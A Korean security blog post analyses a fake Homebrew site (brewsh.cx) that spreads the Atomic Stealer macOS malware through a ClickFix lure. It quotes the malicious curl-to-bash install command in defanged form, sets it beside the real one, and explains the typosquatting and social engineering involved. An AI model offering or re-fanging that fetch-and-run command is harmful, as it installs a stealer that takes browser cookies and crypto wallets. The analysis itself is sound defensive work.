맥북 Homebrew 패키지 관리자 사칭 아토믹스틸러(Atomic Stealer) 클릭픽스(ClickFix) 유포 사이트-brewsh(.)cx(2025.7.28)

오늘은 맥북 Homebrew 패키지 관리자 사칭 아토믹스틸러(Atomic Stealer) 에 대해 글을 적어 보겠습니다.
Homebrew는 macOS (및 Linux)를 위한 패키지 관리자이며 맥에서 소프트웨어를 설치하고 관리하는 것을 훨씬 더 쉽고 효율적으로 만들어주는 도구입니다.
아모스스틸러(AMOS Stealer)는 사파리 브라우저의 쿠키들과 암호화폐 지갑과 관련된 정보를 주로 훔치는 것으로 분석되고 있으며 맥북(MacBook) 사용자들을 대상으로 하는 것이 특징입니다.MacOS 에 영향을 주는 악성코드입니다. 해당 악성코드 유포 방식은 ClickFix(클릭픽스)를 방식으로 유포하는 것이 특징입니다.
일단 사이트는 기본적으로 영어로 돼 있지만, 한국어로 변경해도 동작을 합니다.
친절하게 해당 클릭픽스(ClickFix) 유포 사이트는 다음과 같은 설명을 하고 있습니다.

Homebrew 사이트 와 Homebrew 클릭픽스 사이트

Homebrew 클릭픽스 사이트 내용

Homebrew 설치하기
/bin/bash -c "$(curl -fsSL hxxps://raw(.)brewsh(.)cx/Homebrew/install/HEAD/install(.)sh)"
터미널에 붙여 넣기 하세요.
해당 스크립트는 무엇을 할지 설명하고 실행하기 전에 잠시 멈춥니다. 더 자세한 설치 옵션사항을 보려면 여기를 참고하세요.
If you're on macOS, try our new .pkg installer.
Download it from Homebrew's latest GitHub release.
인 것을 확인할 수가 있습니다.

진짜 Homebrew 설치

/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"

무엇이 틀린 것인지 쉽게 확인을 할 수가 있을 것입니다.

Homebrew 클릭픽스 사이트

클릭픽스(ClickFix) 분석

1. 구조
타이틀 (Homebrew 설치하기
사용자에게 Homebrew 설치 안내를 제공하는 것처럼 보이게 함
복사 가능한 설치 명령어 (copyable)
<figure class="highlight"->코드  강조 라이브러리 사용
사용자가 복사 및 붙여 넣기 하도록 유도
링크 (<a href="hxxp://docsbrewsh/Installation(.)html>)
brewsh(.)cx:brew.sh 와 매우 유사 (타이포스쿼팅 기법)
HTML 구조상 공식 사이트와 유사하게 꾸며 사용자를 속이려는 의도
사회공학적 기법
터미널에 붙여 넣기 하세요: 사용자가 코드 내용을 확인하지 않고 실행하게 유도
설명하고 실행 전에 잠시 멈춥니다: 안전한 것처럼 느끼게 함
실제로는 복사 붙여넣기를 터미널에 하면 다음과 같은 경로에서 악성코드를 다운로드 실행
hxxps://raw(.)brewsh(.)cx/Homebrew/install/HEAD/install(.)sh
즉 맥북 사용자는 자신의 의도와 상관없이 악성코드를 다운로드 및 실행을 하게 됨